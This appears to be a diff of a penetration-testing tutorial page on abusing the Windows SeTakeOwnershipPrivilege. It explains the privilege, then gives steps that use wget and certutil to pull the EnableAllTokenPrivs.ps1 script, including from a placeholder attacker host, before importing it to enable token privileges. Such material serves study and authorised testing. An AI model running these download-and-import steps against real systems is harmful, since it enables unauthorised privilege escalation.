Skip to content

-SeTakeOwnershipPrivilege grants a user the ability to take ownership of any "securable object," meaning Active Directory objects, NTFS files/folders, printers, registry keys, services, and processes.
-This privilege assigns WRITE_OWNER rights over an object, allowing the user to change the owner within the object's security descriptor.
-While administrators have this privilege by default, it can also be assigned to service accounts for specific tasks.
+SeTakeOwnershipPrivilege grants a user the ability to take ownership of any securable object such as Active Directory objects, NTFS files/folders, printers, registry keys, services, and processes, This privilege assigns WRITE_OWNER rights, allowing the user to change the owner within the object’s security descriptor.

 whoami /priv

-Download the EnableAllTokenPrivs.ps1 script to enable SeBackupPrivilege.
+2. Download the EnableAllTokenPrivs.ps1 script:

 wget https://raw.githubusercontent.com/fashionproof/EnableAllTokenPrivs/master/EnableAllTokenPrivs.ps1

-certutil -urlcache -f http://[IP-ADRESS]:80/EnableAllTokenPrivs.ps1 EnableAllTokenPrivs.ps1
+certutil -urlcache -f http://[IP-ADDRESS]:80/EnableAllTokenPrivs.ps1 EnableAllTokenPrivs.ps1

 Import-Module .\EnableAllTokenPrivs.ps1

-Verify privileges,Ensure that SeTakeOwnershipPrivilege is now enabled
+5. Verify that SeTakeOwnershipPrivilege is enabled:

 whoami /priv